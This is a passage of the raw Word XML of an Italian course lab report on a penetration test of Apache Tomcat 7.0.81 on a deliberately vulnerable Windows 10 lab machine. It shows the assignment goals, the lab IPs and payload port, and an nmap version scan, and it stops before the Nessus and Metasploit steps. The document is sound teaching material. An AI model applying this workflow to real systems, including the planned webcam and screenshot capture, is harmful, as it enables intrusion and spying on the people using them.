
<file path=[Content_Types].xml><?xml version="1.0" encoding="utf-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Default Extension="svg" ContentType="image/svg+xml"/>
  <Default Extension="gif" ContentType="image/gif"/>
  <Default Extension="bmp" ContentType="image/bmp"/>
  <Default Extension="odttf" ContentType="application/vnd.openxmlformats-officedocument.obfuscatedFont"/>
  <Default Extension="jpeg" ContentType="image/jpeg"/>
  <Default Extension="png" ContentType="image/png"/>
  <Default Extension="jpg" ContentType="image/jpeg"/>
  <Default Extension="xml" ContentType="application/xml"/>
  <Override PartName="/word/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/word/fontTable.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"/>
  <Override PartName="/word/comments.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.comments+xml"/>
  <Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.setting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body>
    <w:p w14:paraId="00000005">
      <w:pPr>
        <w:spacing w:before="1400" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>EPICODE — Cybersecurity &amp; Ethical Hacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000006">
      <w:pPr>
        <w:spacing w:before="60" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Build Week 2 · Giorno 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000007">
      <w:pPr>
        <w:spacing w:before="480" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1a1a2e"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>Exploit di Windows con Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000008">
      <w:pPr>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1f6feb"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Penetration test end-to-end del servizio Apache Tomcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000009">
      <w:pPr>
        <w:spacing w:before="640" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Relazione di laboratorio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000000A">
      <w:pPr>
        <w:spacing w:before="40" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>28 luglio 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000000B">
      <w:r>
        <w:rPr/>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000000C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="320" w:beforeAutospacing="0" w:after="140" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1a1a2e"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>1. Obiettivo dell'esercizio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000000D">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="276"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Lo scopo del laboratorio è mettere in pratica un penetration test completo contro una macchina Windows di laboratorio, seguendo tutte le fasi che un tester professionista segue nella realtà. In particolare, la traccia chiede di:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000000E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0" w:line="264"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>avviare i servizi vulnerabili sulla macchina Windows 10 target;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000000F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0" w:line="264"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>eseguire una scansione delle vulnerabilità (basic scan) con Nessus;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000010">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0" w:line="264"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>aprire una sessione con Metasploit sfruttando (exploiting) il servizio Apache Tomcat;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000011">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0" w:line="264"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>una volta ottenuta una sessione Meterpreter, raccogliere alcune informazioni sul target: se è una macchina virtuale o fisica, le impostazioni di rete, la presenza di webcam attive e uno screenshot del desktop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000012">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00000013">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="100" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1f6feb"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Ambiente di laboratorio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000014">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="276"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Le due macchine si trovano sulla stessa rete /24. La macchina attaccante è Kali Linux, il bersaglio è una Windows 10 preparata come "Metasploitable" (deliberatamente vulnerabile).</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="100" w:type="pct"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="d5d8dc" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="d5d8dc" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="d5d8dc" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="d5d8dc" w:sz="4" w:space="0"/>
          <w:insideH w:val="single" w:color="e5e7e9" w:sz="4" w:space="0"/>
          <w:insideV w:val="single" w:color="e5e7e9" w:sz="4" w:space="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1295"/>
        <w:gridCol w:w="1677"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="100010000000"/>
            <w:tcW w:w="3400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1f6feb"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000015">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Parametro</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="100001000000"/>
            <w:tcW w:w="5960" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1f6feb"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000016">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Valore</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="3400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="f7f9fb"/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000017">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>IP Kali Linux (attaccante)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000001000000"/>
            <w:tcW w:w="5960" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="f7f9fb"/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000018">
            <w:r>
              <w:rPr>
                <w:b w:val="off"/>
                <w:bCs w:val="off"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>192.168.200.100</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="3400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000019">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>IP Windows 10 (target)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000001000000"/>
            <w:tcW w:w="5960" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0000001A">
            <w:r>
              <w:rPr>
                <w:b w:val="off"/>
                <w:bCs w:val="off"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>192.168.200.200</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="3400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="f7f9fb"/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0000001B">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Listen port del payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000001000000"/>
            <w:tcW w:w="5960" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="f7f9fb"/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0000001C">
            <w:r>
              <w:rPr>
                <w:b w:val="off"/>
                <w:bCs w:val="off"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>7777</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="3400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0000001D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Servizio bersaglio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000001000000"/>
            <w:tcW w:w="5960" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0000001E">
            <w:r>
              <w:rPr>
                <w:b w:val="off"/>
                <w:bCs w:val="off"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Apache Tomcat 7.0.81 (porta 8080)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0000001F">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="100" w:type="pct"/>
        <w:tblBorders>
          <w:top w:val="none" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="1f6feb" w:sz="16" w:space="0"/>
          <w:bottom w:val="none" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:sz="4" w:space="0"/>
          <w:insideH w:val="none" w:sz="4" w:space="0"/>
          <w:insideV w:val="none" w:sz="4" w:space="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1982"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="100010000000"/>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="eaf1fb"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000020">
            <w:pPr>
              <w:spacing w:beforeAutospacing="0" w:after="40" w:afterAutospacing="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1f6feb"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Metodologia in breve</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00000021">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Un penetration test segue sempre un ordine preciso: prima si osserva (ricognizione), poi si analizza (scanning), quindi si attacca (exploitation) e infine si raccolgono le prove del successo (post-exploitation). Ogni fase di questa relazione segue questo schema.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="00000022">
      <w:r>
        <w:rPr/>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000023">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="320" w:beforeAutospacing="0" w:after="140" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1a1a2e"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>2. Fase 1 — Ricognizione (nmap)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000024">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="276"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prima di attaccare bisogna sapere cosa gira sul bersaglio. Da Kali si usa nmap per identificare le porte aperte e la versione dei servizi. Il parametro -sV chiede a nmap di riconoscere la versione del software in ascolto.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="100" w:type="pct"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="d5d8dc" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="1f6feb" w:sz="12" w:space="0"/>
          <w:bottom w:val="single" w:color="d5d8dc" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="d5d8dc" w:sz="4" w:space="0"/>
          <w:insideH w:val="none" w:sz="4" w:space="0"/>
          <w:insideV w:val="none" w:sz="4" w:space="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1822"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="100010000000"/>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="f2f3f5"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000025">
            <w:pPr>
              <w:spacing w:beforeAutospacing="0" w:after="20" w:afterAutospacing="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b4f72"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>nmap -sV -p8080 192.168.200.200</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="00000026">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="276"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Il risultato conferma che sulla porta 8080 è in ascolto un server web Apache Tomcat (Coyote JSP engine). È proprio il servizio che la traccia chiede di sfruttare.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000027">
      <w:pPr>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="40" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5334000" cy="2733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8"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="2733675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000028">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="200" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figura 1 — nmap identifica Apache Tomcat sulla porta 8080 del target.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="100" w:type="pct"/>
        <w:tblBorders>
          <w:top w:val="none" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="1f6feb" w:sz="16" w:space="0"/>
          <w:bottom w:val="none" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:sz="4" w:space="0"/>
          <w:insideH w:val="none" w:sz="4" w:space="0"/>
          <w:insideV w:val="none" w:sz="4" w:space="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2098"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="100010000000"/>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="eaf1fb"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000029">
            <w:pPr>
              <w:spacing w:beforeAutospacing="0" w:after="40" w:afterAutospacing="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1f6feb"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Perché è importante il MAC address</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0000002A">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Nell'output compare anche il MAC address del target (0A:CF:10:76:09:9B). Ce ne ricorderemo più avanti: ritrovarlo identico nella fase di post-exploitation conferma che stiamo lavorando davvero sulla macchina giusta.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0000002B">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="276"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Aprendo il servizio nel browser (http://192.168.200.200:8080) si conferma visivamente la versione esatta: Apache Tomcat 7.0.81.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000002C">
      <w:pPr>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="40" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5334000" cy="3467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9"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="3467100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000002D">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="200" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figura 2 — Pagina di benvenuto di Apache Tomcat 7.0.81 sul target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000002E">
      <w:r>
        <w:rPr/>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000002F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="320" w:beforeAutospacing="0" w:after="140" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1a1a2e"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>3. Fase 2 — Vulnerability scanning (Nessus)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000030">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="276"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
